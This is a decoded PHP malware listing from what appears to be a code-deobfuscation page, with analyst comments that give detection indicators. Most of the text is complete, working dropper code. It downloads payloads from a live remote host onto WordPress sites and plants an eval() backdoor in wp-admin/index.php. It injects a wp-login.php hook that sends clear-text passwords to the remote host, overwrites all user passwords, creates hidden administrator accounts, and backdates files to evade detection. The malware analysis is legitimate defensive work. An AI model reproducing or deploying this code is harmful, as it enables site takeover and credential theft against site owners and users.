PHP Decode
<?php header( 'Content-Type: text/html;charset=utf-8' ); error_reporting( E_ALL ); $s..
Decoded Output download
<?php
// [analyst note] Decoded listing of a dropper aimed at WordPress sites. The top-level code runs
// as soon as the file is requested, with the privileges of the web server account.
header( 'Content-Type: text/html;charset=utf-8' );
error_reporting( E_ALL );
// Assigned here but not read anywhere in the visible listing.
$seclevel = "|wp-head.php|wp-site.php";
// Remote host that every payload below is downloaded from; useful as a network indicator
// when reviewing outbound web-server traffic.
$domain = "http://s.newnday.xyz/";
// Filesystem path of this script and the directory part of it.
$script_name= $_SERVER["SCRIPT_FILENAME"];
$scriptpath=pathinfo($script_name);
$scrip_dir=$scriptpath['dirname'];
// URL path of this script and the directory part of it; compared with the filesystem
// directory in the following statements to work out the site root.
$fullurl=$_SERVER['PHP_SELF'];
$currentpath=pathinfo($fullurl);
$currentdir=$currentpath['dirname'];
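// Decoder artifact repaired: the decoded listing printed the second operand as "\" (an
// unterminated string literal). The original source on this page compares against a single
// backslash, written "\\".
// If the script is requested from the top-level URL directory, its own directory is taken as
// the site root; otherwise the URL directory is cut off the filesystem directory and the
// part in front of it is used.
if($currentdir=='/' || $currentdir=="\\")
{
$root=$scrip_dir;
}
else
{
$dirinfo=explode($currentdir,$scrip_dir);
$root=$dirinfo[0];
}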
// Fall back to DOCUMENT_ROOT when the derived root is empty or still contains ".php".
if($root=='' || strpos($root, ".php") !== false )
{
$root=$_SERVER['DOCUMENT_ROOT'];
}
// The resolved root is echoed to the caller and made the working directory, so the relative
// paths used later (".htaccess", "wp-admin/index.php", "gh.php") resolve against it when the
// chdir succeeds (errors are suppressed with @).
echo $root.'<br/>';
@chdir( $root );
// Scheme and host come from the request; they are used to build the URLs the script prints
// and the Sitemap lines written to robots.txt.
$http = ( isset( $_SERVER["HTTPS"] ) && $_SERVER["HTTPS"] == "on" ) ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
// Optional "db" request parameter; stored in $gov, which is not read again in the visible listing.
if (isset($_GET["db"])) {
$gov = $_GET["db"];
} else if (isset($_POST["db"])) {
$gov = $_POST["db"];
} else {
$gov = '';
}
// "message_type" selects the report format in output_message(): 'html' (default) or JSON.
if ( isset( $_POST['message_type'] ) && ! empty( $_POST['message_type'] ) ) {
$message_type = $_POST['message_type'];
} else {
$message_type = 'html';
}
// Optional "q" request parameter; not read again in the visible listing.
if (isset($_GET["q"])) {
$q = $_GET["q"];
} else if (isset($_POST["q"])) {
$q = $_POST["q"];
} else {
$q = '';
}
// If this script's own name contains "php7", every generated file name gets a "7" appended
// (for example ".php7").
$current_name=basename($_SERVER['PHP_SELF']);
if(strpos($current_name,'php7') !== false)
{
$enfile7='7';
}
else
{
$enfile7='';
}
// Function names held in variables and invoked indirectly, so no literal call appears at the
// call sites below.
$f_put = "file_put_contents";
$f_get = "file_get_contents";
// Ask the remote host for a record keyed by this site's Host header. Only the first line of
// the response is used.
$sellerinfo=$f_get($domain.'/seller/readtxt1.php?domain='.$_SERVER["HTTP_HOST"]);
$sellerinfoarr=explode("
",$sellerinfo);
$sellerinfo=$sellerinfoarr[0];
if($sellerinfo<>'')
{
// Record format as parsed here: "<url>|<entry>,<entry>,..." where each entry is split on ":".
// The entry containing the size of the local file at the URL's path sets $mode.
// NOTE(review): what the "seller" file and $mode represent is not shown in this listing.
if(strpos($sellerinfo,'|') !== false)
{
$sellerinfoarray=explode('|',$sellerinfo);
$sellerinfo=$sellerinfoarray[0];
$sellersizearray=explode(',',$sellerinfoarray[1]);
$parsedUrl = parse_url(trim($sellerinfo));
$sellsize=filesize($root.$parsedUrl['path']);
foreach($sellersizearray as $sellersizeinfo)
{
if(strpos($sellersizeinfo,strval($sellsize)) !== false)
{
$modelarray=explode(':',$sellersizeinfo);
$mode=(int)$modelarray[1];
break;
}
}
}
// $seller is the URL's path only when that file already exists under the site root.
$parsedUrl = parse_url(trim($sellerinfo));
if(file_exists($root.$parsedUrl['path']))
{
$seller = $parsedUrl['path'];
}
else
{
$seller ='';
}
}
else
{
$seller ='';
}
// Remote-supplied path is echoed into the HTML response without escaping.
echo '<span style="font-size:15px; color:red;">seller-enfile:'.$seller.'</span><br/>';
// Disabled code kept by the author: it would have prepended the downloaded "login" part to the
// existing seller file in place.
// if(file_exists($root.$seller))
// {
// $sellerfc=file_get_contents($root.$seller);
// $loginpart=get($domain.'mjcode/login.gif');
// if($loginpart)
// {
// $sellerlast=$loginpart.$sellerfc;
// $serllerput=file_put_contents($root.$seller,$sellerlast);
// if($serllerput)
// {
// echo 'mjlogin success';
// }
// }
// else
// {
// echo '<span style="color:red;">mjlogin fail</span>';
// }
// }
// fi1() fills $arpath8 with directories under the root that have no index.php; fp2() filters
// that list by depth.
$arpath8 = array();
fi1( $root );
$fp2 = @fp2($root);
$htens = array();
// Content that sedht() writes over the site's .htaccess: a rewrite block that sends every
// request for a non-existent file or directory to index.php.
$ht =
'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';
// Repeats the "q" parsing and $current_name assignment from above with the same result.
if (isset($_GET["q"])) {
$q = $_GET["q"];
} else if (isset($_POST["q"])) {
$q = $_POST["q"];
} else {
$q = '';
}
$current_name=basename($_SERVER['PHP_SELF']);
// fp2(): returns the entries of the global $arpath8 that consist of at least three
// "/"-separated segments once $root is removed from them.
// The parameter is shadowed by `global $root`, so the global value is what the body reads.
// The result is stored in $fp2 by the caller; enfile() imports $fp2 but does not read it in
// the visible listing.
function fp2($root)
{
global $root, $http, $host, $domain, $ht, $gov, $arpath8;
$p_arr = array();
$pnew_arr = array();
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
// Keep only paths that are at least three segments deep.
if (count($p_arr[$k]) >= 3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
// enfile(): downloads content from $domain (remote names end in ".gif") and stores it under
// ".php" names inside the site, then returns a report array with 'title', 'status', 'file'
// (URLs of written files) and, when set, 'message' and 'htcontent'.
// The downloaded content itself is not part of this listing. Most writes are prefixed with @,
// so failures are silent. For incident response, every file name below is a file-system
// indicator to look for under the web root.
function enfile() {
global $root, $http, $host, $domain, $arpath8, $fp2, $enfile7,$seller;
$htens = array();
$return_result = array();
$return_result['title'] = 'create shell';
$return_result['status'] = 'ok';
$return_result['file'] = array();
// Writes <root>/wp-info.php from t1/h2.gif. An existing file is first made writable (0644).
// This write is not added to the report (reporting lines are commented out).
$filename='wp-info.php';
$rfnew = get( $domain . 't1/h2.gif');
if(file_exists($root.'/'.$filename))
{
@chmod($root.'/'.$filename,0644);
}
$xdnew_ok = @file_put_contents($root.'/'.$filename,$rfnew);
if ( $xdnew_ok ) {
$xdnew_url = $http . "://" . $host . '/' . $filename;
//$return_result['message'][] = 'file:' . " 	" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
// Writes <root>/wp-term.php from sitemap/wp-term.gif; not reported.
$filenamesite='wp-term.php';
$siterfnew = get( $domain . 'sitemap/wp-term.gif');
if(file_exists($root.'/'.$filenamesite))
{
@chmod($root.'/'.$filenamesite,0644);
}
$xdnewsite_ok = @file_put_contents($root.'/'.$filenamesite,$siterfnew);
if ( $xdnewsite_ok ) {
$xdnewsite_url = $http . "://" . $host . '/' . $filenamesite;
//$return_result['message'][] = 'file:' . " 	" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
// Writes <root>/wp-ver.php from t1/wp-ver.gif; not reported.
$filenamever='wp-ver.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamever))
{
@chmod($root.'/'.$filenamever,0644);
}
$xdnewver_ok = @file_put_contents($root.'/'.$filenamever,$verrfnew);
if ( $xdnewver_ok ) {
$xdnewver_url = $http . "://" . $host . '/' . $filenamever;
//$return_result['message'][] = 'file:' . " 	" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
// Overwrites <root>/wp-content/index.php with the same t1/wp-ver.gif content; not reported.
$filenamwpindex='wp-content/index.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamwpindex))
{
@chmod($root.'/'.$filenamwpindex,0644);
}
$xdnewpindex_ok = @file_put_contents($root.'/'.$filenamwpindex,$verrfnew);
if ( $xdnewpindex_ok ) {
$xdnewpindex_url = $http . "://" . $host . '/' . $filenamwpindex;
//$return_result['message'][] = 'file:' . " 	" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
// Writes <root>/wp-content/plugins/wp-ver.php, again from t1/wp-ver.gif; not reported.
$filenamever2='wp-content/plugins/wp-ver.php';
$verrfnew = get( $domain . 't1/wp-ver.gif');
if(file_exists($root.'/'.$filenamever2))
{
@chmod($root.'/'.$filenamever2,0644);
}
$xdnewver2_ok = @file_put_contents($root.'/'.$filenamever2,$verrfnew);
if ( $xdnewver2_ok ) {
$xdnewver2_url = $http . "://" . $host . '/' . $filenamever2;
//$return_result['message'][] = 'file:' . " 	" . $xdnew_url . ' success';
//$return_result['file'][] = $xdnew_url;
}
// Writes <root>/wp-content/plugins/wp-config-sample.php from t1/blust.gif; this one IS
// added to the report.
$filename2='wp-content/plugins/wp-config-sample.php';
$rfnew2 = get( $domain . 't1/blust.gif');
if(file_exists($root.'/'.$filename2))
{
@chmod($root.'/'.$filename2,0644);
}
$xdnew_ok2 = @file_put_contents($root.'/'.$filename2,$rfnew2);
if ( $xdnew_ok2 ) {
$xdnew_url2 = $http . "://" . $host . '/' . $filename2;
$return_result['message'][] = 'file:' . " 	" . $xdnew_url2 . ' success';
$return_result['file'][] = $xdnew_url2;
}
// Writes <root>/wp-admin.php (a file in the root, not the wp-admin directory) from t1/u1.gif;
// not reported.
$filename5='wp-admin.php';
$rfnew5 = get( $domain . 't1/u1.gif');
if(file_exists($root.'/'.$filename5))
{
@chmod($root.'/'.$filename5,0644);
}
$xdnew_ok5 = @file_put_contents($root.'/'.$filename5,$rfnew5);
if ( $xdnew_ok5 ) {
$xdnew_url5 = $http . "://" . $host . '/' . $filename5;
//$return_result['message'][] = 'file:' . " 	" . $xdnew_url5 . ' success';
//$return_result['file'][] = $xdnew_url5;
}
// Writes <root>/wp-admin/checkbox.php from t1/u1.gif and sets its timestamp 280 days into the
// past, so a "recently modified files" search will not surface it; not reported.
$filename6='wp-admin/checkbox.php';
$rfnew6 = get( $domain . 't1/u1.gif');
if(file_exists($root.'/'.$filename6))
{
@chmod($root.'/'.$filename6,0644);
}
$xdnew_ok6 = @file_put_contents($root.'/'.$filename6,$rfnew6);
if ( $xdnew_ok6 ) {
$xdnew_url6 = $http . "://" . $host . '/' . $filename6;
//$return_result['message'][] = 'file:' . " 	" . $xdnew_url6 . ' success';
//$return_result['file'][] = $xdnew_url6;
@touch('wp-admin/checkbox.php', strtotime("-280 days", time()));
}
// Writes <root>/checkbex.php. Without a seller file the content is t1/h3.gif; with one, it is
// the downloaded mjcode/login.gif part followed by a copy of the local seller file. Reported.
$loginpart=get( $domain . 'mjcode/login.gif');
$filename3='checkbex.php';
if(!$seller)
{
$rfnew3 = get( $domain . 't1/h3.gif');
}
else
{
$rfnew3 =file_get_contents($root.$seller);
$rfnew3 = $loginpart.$rfnew3;
}
if(file_exists($root.'/'.$filename3))
{
@chmod($root.'/'.$filename3,0644);
}
$xdnew_ok3 = @file_put_contents($root.'/'.$filename3,$rfnew3);
if ( $xdnew_ok3 ) {
$xdnew_url3 = $http . "://" . $host . '/' . $filename3;
$return_result['message'][] = 'file:' . " 	" . $xdnew_url3 . ' success';
$return_result['file'][] = $xdnew_url3;
}
// Second stage: spread copies into directories collected by fi1() (those without an index.php).
$check_repeat = array();
// $custom_file = array('wp-content','wp-includes');
$custom_file = array();
// Remote payload names, fetched from $domain . 't1' . <name> in the loop below.
$wrmfwlf = array(
'/h1.gif',
'/h2.gif',
'/h3.gif',
'/h4.gif',
'/h5.gif',
'/i1.gif',
'/i2.gif',
'/i3.gif',
'/i4.gif',
'/i5.gif'
);
// With a seller file, its local path is appended twice as two extra sources.
if($seller)
{
array_push($wrmfwlf,$seller,$seller);
}
// Target directories: all of them when nine or fewer were found, otherwise a random pick of
// as many directories as there are sources.
if(count($arpath8)<=9)
{
for($num=0;$num<count($arpath8);$num++)
{
array_push( $custom_file, $arpath8[$num] );
}
}
else
{
$ranfile = array_rand( $arpath8, count( $wrmfwlf ) - count( $custom_file ) );
foreach ( $ranfile as $i ) {
array_push( $custom_file, $arpath8[ $i ] );
}
}
// File names given to the copies, paired by index with the sources above. $enfile7 appends
// "7" when this script itself was served under a name containing "php7".
$self_shell_name = array(
'updates.php'.$enfile7,
'wp-config-sample.php'.$enfile7,
'wp-config-sample.php'.$enfile7,
'spacings.php'.$enfile7,
'duotones.php'.$enfile7,
'admin.php'.$enfile7,
'index.php'.$enfile7,
'themes.php'.$enfile7,
'customsizes.php'.$enfile7,
'checkbex.php'.$enfile7
);
if($seller)
{
array_push($self_shell_name,'wp-options.php'.$enfile7,'wp-link.php'.$enfile7);
}
//updates.php|wp-config-sample.php|themes.php|dimensiones.php|duotones.php|spacings.php|update.php|customs.php
$i = 0;
if(count($arpath8)<=9)
{
$enfilecount=sizeof( $arpath8 );
}
else
{
$enfilecount=sizeof( $wrmfwlf );
}
while ( $i < $enfilecount ) {
// Record directory => file name; the map is saved to .hcontentold at the end.
$htens[ $custom_file[ $i ] ] = $self_shell_name[ $i ];
// Relative path: resolved against the working directory set at the top of the script.
$sf = $custom_file[$i] . '/' . $self_shell_name[ $i ];
// A source containing ".php" is the local seller file (copied with the login part
// prepended); anything else is downloaded from the remote host.
if(strpos($wrmfwlf[ $i ],'.php') !== false){
$rf = $loginpart.file_get_contents($root.$wrmfwlf[ $i ]);
}else{
$rf = get( $domain . 't1' . $wrmfwlf[ $i ] );
}
$xd_ok = @file_put_contents($sf,$rf);
//$fh = fopen( $sf, "w+" );
//$xd_ok = fwrite( $fh, $rf );
//fclose( $fh );
if ( $xd_ok ) {
$xd_url = $http . "://" . $host . '/' . $sf;
$return_result['message'][] = 'file:' . " 	" . $xd_url . ' success';
$return_result['file'][] = $xd_url;
//if( basename($sf.'/index.php') != 'index.php' ){
// $self_shell_name[] = basename($sf);
//}
}
$i ++;
}
// Modifies the genuine wp-admin/index.php in place: a one-line PHP block that passes the POST
// field "cdshell" to eval() is put in front of the existing content, followed by downloaded
// k/ver.gif content. The file timestamp is then set 320 days into the past.
// Detection: compare wp-admin/index.php against a clean copy of the same WordPress release.
$wp_admin_content = @file_get_contents( 'wp-admin/index.php' );
if ( $wp_admin_content ) {
$vercontent=get( $domain.'/k/ver.gif');
$result = @file_put_contents( $root.'/wp-admin/index.php', "<?php if(isset(\$_POST['cdshell']) && !empty(\$_POST['cdshell'])){@eval(\$_POST['cdshell']);} ?>" .$vercontent."
". $wp_admin_content );
if ( $result ) {
@touch('wp-admin/index.php', strtotime("-320 days", time()));
$xd_url = $http . "://" . $host . '/' . 'wp-admin/index.php';
$return_result['message'][] = 'file:' . " 	" . $xd_url . ' success';
$return_result['file'][] = $xd_url;
}
}
// Builds an .htaccess template: the rewrite block, a FilesMatch that denies requests for
// script-like extensions, and a second FilesMatch that allows the names substituted for the
// "{#htens}" placeholder. The substitution itself is not performed in this listing.
$htc = '';
$htc .= '<IfModule mod_rewrite.c>' . "
";
$htc .= 'RewriteEngine On' . "
";
$htc .= 'RewriteBase /' . "
";
$htc .= 'RewriteRule ^index.php$ - [L]' . "
";
$htc .= 'RewriteCond %{REQUEST_FILENAME} !-f' . "
";
$htc .= 'RewriteCond %{REQUEST_FILENAME} !-d' . "
";
$htc .= 'RewriteRule . index.php [L]' . "
";
$htc .= '</IfModule>' . "
";
$htc .= '<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php7|php8|suspected)$">' . "
";
$htc .= 'Order Allow,Deny' . "
";
$htc .= 'Deny from all' . "
";
$htc .= '</FilesMatch>' . "
";
$htc .= '<FilesMatch "^({#htens})$">' . "
";
$htc .= 'Order Allow,Deny' . "
";
$htc .= 'Allow from all' . "
";
$htc .= '</FilesMatch>' . "
";
// Two hidden state files in the web root: .hcontentold (JSON map of directory => file name)
// and .hcontent (the template). Only the result of the second write is checked.
$htresult = file_put_contents( $root . '/.hcontentold', json_encode( $htens ) );
$htresult = file_put_contents( $root . '/.hcontent', $htc );
if ( $htresult ) {
$return_result['htcontent'] = $htc;
}
return $return_result;
}
// get(): HTTP GET through cURL; returns the response body, or false when curl_exec() fails.
// Callers write the return value to disk without checking it.
function get( $url ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $url );
// Redirects are followed, so the final content can come from a different host than $url.
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
curl_setopt( $ch, CURLOPT_ENCODING, 'gzip,deflate' );
// An empty "Expect:" header suppresses cURL's automatic "Expect: 100-continue".
curl_setopt( $ch, CURLOPT_HTTPHEADER, array( 'Expect:' ) );
// Certificate and host-name verification are switched off when the URL does NOT contain
// "https:"; for an http:// URL this only matters if a redirect leads to HTTPS.
if ( stripos( $url, "https:" ) === false ) {
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
}
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
$body = curl_exec( $ch );
curl_close( $ch );
return $body;
}
// output_message(): prints a step report to the HTTP response.
//   $result       report array ('title', 'message' list, optional 'status')
//   $message_type 'html' for markup, anything else for a JSON dump of $result
//   $html_tag     element wrapped around each message line
// Message text is echoed without HTML escaping.
function output_message( $result, $message_type = 'html', $html_tag = 'li' ) {
if ( $message_type != 'html' ) {
echo json_encode( $result );
return;
}
if ( ! is_array( $result ) ) {
return;
}
if ( ! isset( $result['title'] ) ) {
$result['title'] = '';
}
echo '---------start ' . $result['title'];
// Reads $result['message'] without checking that the key exists.
if ( sizeof( $result['message'] ) > 0 ) {
foreach ( $result['message'] as $message ) {
// Colour the words "success", " ok" and "fail" inside each line.
$message = str_replace( 'success', '<font color="blue">success</font>', $message );
$message = str_replace( ' ok', '<font color="blue"> ok</font>', $message );
$message = str_replace( 'fail', '<font color="red">fail</font>', $message );
echo "<$html_tag>" . $message . "</$html_tag>";
}
}
if ( isset( $result['status'] ) && ! empty( $result['status'] ) ) {
// $status stays unset when the status is neither 'ok' nor 'fail'.
if ( $result['status'] == 'ok' ) {
$status = '<font color="green">' . $result['status'] . '</font>';
}
if ( $result['status'] == 'fail' ) {
$status = '<font color="red">' . $result['status'] . '</font>';
}
echo '---------end ' . $result['title'] . '===>status:' . $status;
} else {
$status = '<font color="green">ok</font>';
echo '---------end ' . $result['title'] . '===>status:' . $status;
}
echo "<br />";
}
// adduser(): creates or takes over a WordPress account directly in the database.
//   $username           login name to create or update
//   $encryptedPassword  value written verbatim into the user_pass column
//   $changeAllPassword  when true, user_pass of EVERY row in the users table is overwritten first
// Returns a status string. Database credentials are scraped from wp-config.php with regular
// expressions. All SQL is built by string interpolation, and no query result is checked.
// Detection: unexpected rows in <prefix>users, and administrator capabilities in
// <prefix>usermeta for accounts the site owner did not create.
function adduser($username, $encryptedPassword, $changeAllPassword)
{
global $root, $http, $host, $domain, $ht, $gov;
// Relative path: resolved against the current working directory.
$contents = file_get_contents("wp-config.php");
// Pull the define() values for DB_NAME, DB_USER, DB_PASSWORD, DB_HOST and $table_prefix.
preg_match("@['|\"]DB_NAME['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchd);
preg_match("@['|\"]DB_USER['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchu);
preg_match("@['|\"]DB_PASSWORD['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchp);
preg_match("@['|\"]DB_HOST['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchh);
preg_match("@table_prefix\s*=\s*['|\"](.*?)['|\"]@", $contents, $matchw);
$db_name = $matchd[1];
$db_user = $matchu[1];
$db_pass = $matchp[1];
$db_host = $matchh[1];
$db_pre = $matchw[1];
$db_port = "3306";
// Split "host:port" when DB_HOST carries a port.
if (strstr($db_host, ":")) {
$arr = explode(":", $db_host);
$db_host = $arr[0];
$db_port = $arr[1];
}
if (trim($db_host) == "") {
$db_host = "localhost";
}
$con = mysqli_connect($db_host, $db_user, $db_pass, $db_name, $db_port);
// No WHERE clause: this replaces the password hash of every account on the site.
if ($changeAllPassword == true) {
$sql = "update $db_pre" . "users set user_pass='$encryptedPassword'";
$query = mysqli_query($con, $sql);
}
$sql = "select * from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
if (!empty($row)) {
// Account already exists: only its password is replaced.
$id= $row['ID'];
$sql = "update $db_pre" . "users set user_pass='$encryptedPassword' where user_login='$username';";
$query = mysqli_query($con, $sql);
return "user $username exists, change password";
} else {
// Insert the account with a fixed registration date. The e-mail value reads
// '[email protected]' on this page; presumably the hosting site masked the real address.
$sql = "insert into $db_pre" . "users(user_login,user_pass,user_nicename,user_email,user_registered,user_activation_key,user_status,display_name) values('$username', '$encryptedPassword', '$username', '[email protected]', '2021-05-21 09:13:26', '', '0', '$username');";
$query = mysqli_query($con, $sql);
$sql = "select ID from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
$id = $row['ID'];
// Grant the administrator role through the serialized capabilities meta value.
$sql = "insert into $db_pre" . "usermeta(user_id, meta_key, meta_value) values($id, '$db_pre" . "capabilities', 'a:1:{s:13:\"administrator\";b:1;}');";
$query = mysqli_query($con, $sql);
$sql = "select * from $db_pre" . "users where user_login='$username';";
$query = mysqli_query($con, $sql);
$row = mysqli_fetch_array($query);
if ($row['user_login'] == $username) {
return "useradd $username ok";
}
// Reached only when the check above did not return: copies the usermeta rows of user ID 1
// to the new user ID where the key is not present yet.
$sql = "select * from ".$db_pre."usermeta where user_id=1 ;";
$result = mysqli_query($con,$sql);
if (mysqli_num_rows($result) > 0) {
while($row = mysqli_fetch_array($result)) {
$meta_key[]=$row["meta_key"];
$meta_value[]= $row["meta_value"];
}
}
for($b=0;$b<count($meta_key);$b++)
{
if($meta_key[$b]<>'')
{
$sql = "select * from ".$db_pre."usermeta where user_id=". $id." and meta_key='".$meta_key[$b]."';";
$result = mysqli_query($con,$sql);
if (mysqli_num_rows($result) <= 0)
{
$sql = "insert into ".$db_pre."usermeta(user_id, meta_key, meta_value) values(".$id.", '".$meta_key[$b]."', '".$meta_value[$b]."');";
$query = mysqli_query($con, $sql);
}
}
}
}
return "useradd $username fail";
}
// loginpassword(): plants a credential logger in wp-login.php and calls adduser() twice.
// Returns a report array ('title' plus 'message' entries).
// Detection: wp-login.php differs from the clean file of the installed WordPress release and
// contains the marker comment "/*login*/" and a helper function named getm().
function loginpassword()
{
global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode, $domain;
$return_result = array();
$return_result['title'] = __FUNCTION__;
if (file_exists($root."/wp-login.php")) {
// Code injected into wp-login.php. On a login POST it calls wp_authenticate() and, when the
// credentials are valid, sends timestamp, site host, user name and clear-text password to
// wup.php on the remote host as GET parameters.
$src="/*login*/
function getm(\$url){ \$ch = curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1); \$cnt = curl_exec(\$ch); curl_close(\$ch); return \$cnt;} if(isset(\$_POST['log']) && isset(\$_POST['pwd'])) { \$username=\$_POST['log'];
\$password=\$_POST['pwd'];
if(\$username){ \$userm = wp_authenticate( \$_POST['log'], \$_POST['pwd']);
if ( !is_wp_error( \$userm ) ) {
\$hurl=\$_SERVER['HTTP_HOST']; \$m=\"dt=\".date(\"Y-m-d-H:i:s\",time()).\"&shost=\".\$hurl.\"&user=\".\$username.\"&pwd=\".\$password; \$ws=\"http://s.newnday.xyz/\"; @getm(\$ws.'/wup.php?'.\$m);} } } ";
$wplogin_file=$root.'/wp-login.php';
// $wploginc remains undefined if fopen() fails; the handle is never closed.
$handle = fopen($wplogin_file, "r");
if ($handle) {
$size = filesize($wplogin_file);
$wploginc = fread($handle, $size);
}
$f_put = "file_put_contents";
$f_get = "file_get_contents";
// Empties whatever sits between "case 'login':" and the next "default:".
// NOTE(review): presumably this removes a block injected by an earlier run - inference only.
if (preg_match('/case \'login\':[\s\S]*?default:/', $wploginc)) {
$wploginc = preg_replace('/case \'login\':[\s\S]*?default:/', "case 'login':"."
"."
".'default:', $wploginc);
}
// Inserts $src in front of every occurrence of "default:" in the file.
$wploginc= str_replace('default:',$src."
"."
".'default:',$wploginc);
$f_put($root.'/wp-login.php',$wploginc);
// Second pass: the clear-text host literal inside the injected code is replaced with the
// output of strto16(). strto16() is not defined in the visible listing.
$wplogin=$f_get($root.'/wp-login.php');
$wplogin_code= str_replace("http://s.newnday.xyz/",strto16("http://s.newnday.xyz/"),$wplogin);
$f_put($root.'/wp-login.php',$wplogin_code);
}
if (file_exists($root."/wp-config.php")) {
// First call passes true: every existing account's password hash is overwritten with the
// hard-coded value, locking out the legitimate users. The second value is a 32-character
// hex string and is only applied to the "wp-user" account.
$return_result['message'][] = adduser('wp-blog', '$P$BrYz9dLFOzP5z/3vTIH2fhdtEyGH7z.', true);
$return_result['message'][] = adduser('wp-user', '3a0b9bff4e2649af7d4c62878bf88b3e', false);
}
if (!is_dir($root . '/wp-includes') || !is_dir($root . '/wp-content')) {
$return_result['message'][] ='The site is not wp.';
}
return $return_result;
}
// Main sequence: rewrite robots.txt and .htaccess, write the payload files, fetch gh.php, then
// print a report of everything that was written.
$sedht_result = sedht();
output_message($sedht_result, $message_type);
$enfile_result = enfile(); // 3
down_s_file();
// The adduser() calls here are disabled; account creation happens inside loginpassword().
if ( file_exists( "wp-config.php" ) ) {
//$adduser_message = adduser();
//$enfile_result['message'][] = $adduser_message;
}
output_message( $enfile_result, $message_type );
if ( $message_type == 'html' ) {
if ( isset( $enfile_result['file'] ) && sizeof( $enfile_result['file'] ) ) {
echo "path:<br /><textarea style=\"width: 90%;height: 100px;\">";
foreach ( $enfile_result['file'] as $file ) {
// Each written file's URL is printed with a hard-coded "pas" query value appended.
// NOTE(review): presumably the access key the written files expect - their content is
// not in this listing. Requests carrying "pas=" in access logs are worth searching for.
$pas="Go#%1024@Mvc";
echo $file."?pas=" .$pas. " ";
}
echo "</textarea>";
}
if ( isset( $enfile_result['htcontent'] ) ) {
echo "htcontent:<br /><textarea style=\"width: 40%;height: 200px;\">";
echo $enfile_result['htcontent'];
echo "</textarea>";
}
}
// down_s_file(): downloads h/gh.gif from the remote host and stores it as gh.php in the
// current working directory. The downloaded content is not part of this listing.
function down_s_file() {
global $domain;
$gh = get( $domain . '/h/gh.gif' );
if ( function_exists( 'file_put_contents' ) ) {
file_put_contents( 'gh.php', $gh );
} else {
// Fallback path appends to gh.php instead of replacing it.
$fh = fopen( 'gh.php', "a+" );
fwrite( $fh, $gh );
fclose( $fh );
}
}
// fi1(): recursive directory walk that collects, in the global $arpath8, the root-relative
// path of every directory that does not contain an index.php. Symbolic links are skipped.
// The list is shuffled at the end of every call, including the recursive ones.
function fi1( $path ) {
global $root, $arpath8;
// The directory handle is never closed.
if ( $handle = opendir( $path ) ) {
while ( ( $file = readdir( $handle ) ) !== false ) {
if ( $file != "." && $file != ".." ) {
$pfile = $path . "/" . $file;
if ( is_dir( $pfile ) && ! is_link( $pfile ) ) {
// Descend only while the relative path has fewer than three "/" separators.
if ( substr_count( str_replace( $root . '/', '', $pfile ), '/' ) < 3 ) {
fi1( $pfile );
}
if ( ! file_exists( $pfile . "/index.php" ) ) {
array_push( $arpath8, str_replace( $root . '/', '', $pfile ) );
}
}
}
}
}
shuffle( $arpath8 );
}
// sedht(): overwrites robots.txt and .htaccess in the site root and deletes sitemap.xml.
// Returns a report array with 'message' entries and, on .htaccess failure, 'status' = 'fail'.
// Detection: robots.txt listing four Sitemap entries for the site's own host, a missing
// sitemap.xml, and a read-only (0444) .htaccess.
function sedht()
{
global $root, $http, $host, $ht, $domain;
$return_data = array();
// robots.txt template; "host" is replaced with scheme://host of the current request.
$robots_code="User-agent: *"."
"."Allow: /"."
"."
"."Sitemap: host/sitemap.xml"."
"."Sitemap: host/sitemap.xml.gz"."
"."Sitemap: host/?sitemap.xml"."
"."Sitemap: host/sitemap.xml.gz";
$robots_code=str_replace('host',$http.'://'.$host,$robots_code);
$robots_put=@file_put_contents($root.'/robots.txt', $robots_code);
if (!$robots_put || $robots_code=='')
{
$return_data['message'][] = 'modify file robots.txt file fail.';
}
else
{
$return_data['message'][] = 'modify file robots.txt file success.';
}
// The site's static sitemap.xml is removed.
if(file_exists($root .'/sitemap.xml'))
{
@unlink($root .'/sitemap.xml');
}
// .htaccess is made writable, its change time is read, the content is replaced with $ht, and
// the saved time is applied again with touch() so the modification time looks untouched.
@chmod('.htaccess', 0644);
$file_time = filectime('.htaccess');
$n = file_put_contents('.htaccess', $ht);
if (!$n) {
$return_data['status'] = 'fail';
$return_data['message'][] = 'write .htaccess file fail';
} else {
$return_data['message'][] = '.htaccess create success.';
touch('.htaccess', $file_time);
$return_data['message'][] = '.htaccess time modify success';
// Read-only for everyone, which makes later edits by the site owner or a plugin fail.
@chmod('.htaccess', 0444);
$return_data['message'][] = '.htaccess 0444 modify success';
}
return $return_data;
}
// urla(): cURL request helper with optional request headers and POST fields; returns the
// response body or false. It is not called anywhere in the visible listing.
//   $header    array of header lines, ignored unless a non-empty array
//   $postdata  array of POST fields; when a non-empty array, the request becomes a POST
